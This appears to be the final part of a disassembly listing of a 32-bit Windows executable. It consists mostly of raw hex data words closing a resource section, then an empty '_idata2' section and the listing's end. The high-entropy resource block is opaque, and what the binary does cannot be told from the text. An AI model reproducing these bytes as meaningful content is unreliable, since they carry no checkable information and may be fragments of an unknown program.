dd 99092A36h, 2675F0CAh, 1785A524h, 8879525Ch, 7AE9D3DDh
dd 0C2B5DEEEh, 1BE5E5EFh, 4683E976h, 0BE47777Dh, 0EA77877Ah
dd 9FA9AD81h, 0E0BA5F6Dh, 8C860B25h, 320C0C22h, 5301F8FAh
dd 0C6CF9E98h, 3A9FCFB3h, 0C62C6E9Fh, 0D8C9B33Ah, 5C62E564h
dd 89F9929Ch, 8AA47632h, 7E0AF4CEh, 1C160945h, 42A8AEE3h
dd 7E8B6E15h, 0DB3C31C2h, 0D3EAD9C3h, 40D819EDh, 46261A05h
dd 13C883D7h, 5BAE9D87h, 0E5F3907Dh, 9D08A19h, 374285CEh
dd 0E1BB427Bh, 0A993DA29h, 9B8582DDh, 0F4051B66h, 0B9C9643Eh
dd 5D5749F1h, 0A975625h, 0BFC9C4AFh, 0DF857D8Bh, 0ABE92903h
dd 0FDE3622Fh, 0B18C8BF5h, 447CBF14h, 6D0F1A06h, 252F96ADh
dd 7A1BC459h, 779DA532h, 0AB6082BBh, 2E12152Dh, 8A919AFCh
dd 0F845747Eh, 6A3DC270h, 10914549h, 79D7CFB2h, 2F0A1C51h
dd 18FB530Bh, 5BEAB970h, 0FCF5EDFBh, 8AD3BF2Ch, 0F2F18685h
dd 6FA5F245h, 411DD554h, 0B80CD9Ah, 403E888Eh, 0D333D222h
dd 291356A9h, 0C10D905Dh, 0F289A0CAh, 0ACB60D37h, 1E27D5F0h
dd 202F2510h, 11796662h, 43459B2h, 0CDC5D8FFh, 0BBF2BA95h
dd 0E626A78h, 5D021E4Dh, 80E1C1Eh, 0E4D3BFCCh, 0AFF3EDB9h
dd 0C272757Fh, 5D7D1E14h, 360A1027h, 0E2BBF2EDh, 93A9A2A0h
dd 0D2D8968Dh, 3C191B59h, 2B302041h, 0B1B7E0E6h, 0D8DED1E3h
dd 0DF988293h, 676E3B14h, 792B202Fh, 7101FA5h, 9CC2CBDCh
dd 0EBDFFDD9h, 7A747935h, 7262C2Ah, 94FF7871h, 0ABD12E26h
dd 8266D4EEh, 0F03EC8Ch, 0AF314091h, 2D22124Fh, 536EE2CFh
dd 4C403659h, 0F1CBC977h, 9229C3B7h, 26F3A959h, 0ABB10C78h
dd 0F23448B2h, 392FCBF9h, 551CC0F6h, 3D0B1415h, 87A8CE6Dh
dd 0AAB69E54h, 0DBBD8BEDh, 0E44D141Eh, 0C2B8B8BEh, 0E3F356F4h
dd 9F9997C5h, 0FBDBEC6Fh, 3D8647DCh, 96CFC777h, 1DE0B2F2h
dd 9A2B11A7h, 39CFFDFFh, 7E3C5AFBh, 0AB3BC4F6h, 674E38D7h
dd 57196D9Bh, 856F0BFFh, 0D6F2819Ch, 37275354h, 106AFF7Fh
dd 53BB6AE4h, 0AE846AB5h
dd 0E20A0087h, 95DC18A8h, 417B7AF8h, 2A394685h, 91D9ACF3h
dd 869D8EDAh, 20247A18h, 36BFC0B6h, 2A253847h, 0A5B0D5ABh
dd 0C9839A8Ch, 0BB390879h, 2435636Eh, 0A39825EBh, 21126B60h
dd 55C8F6E0h, 10671E32h, 1CA2D7CDh, 1E130E5Eh, 0A60F85D7h
dd 8F43443Bh, 0ADB8AFA1h, 0EA029928h, 1272B1A7h, 79B24CCAh
dd 584FA13Eh, 8BB2DC14h, 8D1C5D48h, 0C5BBBD4Bh, 459DAF4Dh
dd 93595A52h, 322A2F64h, 16DA34EEh, 2F393757h, 9F94319Ah
dd 919B715Ch, 4391CAD4h, 0C2D569E8h, 221FC536h, 0AB3A5D67h
dd 0F93A05AAh, 0D2C08FF9h, 5A71D273h, 18121187h, 0A159275Dh
dd 857B7D23h, 0ABB4A757h, 0E26783EFh, 88184C6Dh, 3E484659h
dd 6C452609h, 9B2BCF6Dh, 54D49FB4h, 20C0BEDh, 332B7FB1h
dd 6B6E6D57h, 959F752Dh, 9A9339D9h, 16850F08h, 0A932303Ah
dd 79434115h, 0E9BB2BCh, 0BBC5C319h, 130B5316h, 0D4A52AD0h
dd 0C5585660h, 35028FD3h, 0C37B93D2h, 0A2BDAF7h, 9BD41921h
dd 0C6C45B1Fh, 744E4C02h, 5A52FB5Fh, 0D64F3617h, 9A9A0F19h
dd 387270CAh, 59F7EC78h, 0F44CA29Ch, 0C42A2C21h, 0FC068B8Ah
dd 5182BF3Eh, 0D568555Fh, 519AAAFEh, 3F379039h, 71878AFDh
dd 214B0D79h, 0ACD7BA64h, 97F788C3h, 0A4BE094Bh, 9FECEDC7h
dd 1129A738h, 0B4064F59h, 9B80312Fh, 0F61742B9h, 0EBEBB0B2h
dd 88929E8Fh, 5A46444Eh, 92EEE5F6h, 0E940594Fh, 95262804h
dd 3064299h, 70B62909h, 4A2F4172h, 93FD1C2Ch, 8209CCD6h
dd 0D4DEDD27h, 0D64A718h, 0DD7015E2h, 0B7A1101Fh, 0B088F8CBh
dd 0A37AF18Fh, 0A662225h, 4B0D37DDh, 4C0E0004h, 0EFB6B6F0h
dd 8EABE6F9h, 847DCA11h, 42C52D71h, 11C6F9DCh, 0A2AC9B85h
dd 2F4958E9h, 0B1F1F2E8h, 350F0E34h, 4AB6FA86h, 225EA09Ah
dd 0C8E2E1A3h, 0D52597F3h, 0A7B9320Ch, 5B555309h, 0BCFA0113h
dd 0EF96C5FFh, 5808F66Ah, 1E181751h, 63E7CD9Dh, 357589A3h
dd 0B18B8AA4h, 0CECA7E0Ah, 0A6901C16h, 447E620Fh, 4523CB77h
dd 59E6AF89h, 0E7CD567Fh, 68B7921Bh, 3943727Ch, 6A749BBEh
dd 0F1F8A4AEh, 8A3B54DEh, 0A507363Bh, 0ABF939B0h, 5F597209h
dd 13595827h, 0CE3B361Bh, 0E4837FC5h, 1FEF2B05h, 53775C76h
dd 5E891E2h, 0D9B39AB4h, 86E39A88h, 0E8DEE4C2h, 0A05724A4h
dd 867C7FD7h, 554B6155h, 24CB8511h, 38406D32h, 3D62FE42h
dd 86187781h, 60565717h, 9451E096h, 0B4863A30h, 320C141Dh
dd 5653CFDh, 9698A726h, 0AD99EBABh, 0F500FF09h, 265AF4B1h
dd 0C29E3139h, 88A2BF9Eh, 38CB074Eh, 0D5CBA8C0h, 98265073h
dd 44BE52A6h, 9578786Ch, 514747BDh, 0AB512A92h, 0FB1A1A24h
dd 4164F3E4h, 62947C86h, 61ADADB7h, 0E466DEC8h, 0ED0F0F19h
dd 36404049h, 0EA7155B9h, 55AE86F8h, 0C92B50F3h, 12641D72h
dd 2B35343Eh, 6C4231E4h, 0C8D1DFDh, 8EE4D73Ch, 3531002h
dd 0DD48D6CCh, 60h, 14F6h dup(0)
_rsrc ends
; Section 4. (virtual address 00012000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00012000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 1012000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start